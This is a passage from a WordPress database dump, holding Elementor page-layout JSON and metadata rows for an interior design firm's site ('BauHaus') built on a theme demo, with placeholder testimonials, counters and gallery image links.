\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3145,4757,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3146,4757,'_elementor_pro_version','3.8.1'),(3147,4757,'_elementor_css','a:6:{s:4:\"time\";i:1685009889;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3148,2467,'_elementor_css','a:6:{s:4:\"time\";i:1685009929;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3149,773,'_wp_old_date','2022-11-14'),(3152,4759,'_wp_page_template','elementor_header_footer'),(3153,4759,'ova_met_header_version','ova,header-banner'),(3154,4759,'ova_met_footer_version','ova,footer'),(3155,4759,'ova_met_main_layout','global'),(3156,4759,'ova_met_wide_site','global'),(3157,4759,'_elementor_edit_mode','builder'),(3158,4759,'_elementor_template_type','wp-page'),(3159,4759,'_elementor_version','3.8.1'),(3160,4759,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Bauhaus Office Projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"description\":\"Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.\\n\\nKami meyakini bahwa ruang kantor yang dirancang dengan baik dapat meningkatkan produktivitas serta membangun interaksi positif antar karyawan.\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbcb47e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6cbe328\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"},{\"id\":\"00d9390\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4800,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/Office-1.jpg\"},{\"id\":4801,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-2.jpg\"},{\"id\":4803,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-3.jpg\"},{\"id\":4804,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-4.jpg\"},{\"id\":4805,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-5.jpg\"},{\"id\":4806,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-6.jpg\"},{\"id\":4807,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-7.jpg\"},{\"id\":4808,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-8.jpeg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"17a02e1\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3161,4759,'_elementor_page_assets','a:0:{}'),(3162,4759,'_wxr_import_has_attachment_refs','1'),(3164,4759,'_edit_lock','1695371954:3'),(3165,4759,'_edit_last','2'),(3167,4760,'_wp_page_template','elementor_header_footer'),(3168,4760,'_elementor_edit_mode','builder'),(3169,4760,'_elementor_template_type','wp-page'),(3170,4760,'_elementor_version','3.6.6'),(3171,4760,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(3172,4760,'_elementor_page_assets','a:0:{}'),(3173,4760,'_elementor_css','a:6:{s:4:\"time\";i:1685010019;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3174,4762,'_menu_item_type','post_type'),(3175,4762,'_menu_item_menu_item_parent','4715'),(3176,4762,'_menu_item_object_id','4759'),(3177,4762,'_menu_item_object','page'),(3178,4762,'_menu_item_target',''),(3179,4762,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3180,4762,'_menu_item_xfn',''),(3181,4762,'_menu_item_url',''),(3184,4759,'rs_page_bg_color',''),(3194,684,'_elementor_css','a:6:{s:4:\"time\";i:1685010601;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3195,4764,'_wp_page_template','elementor_header_footer'),(3196,4764,'_elementor_edit_m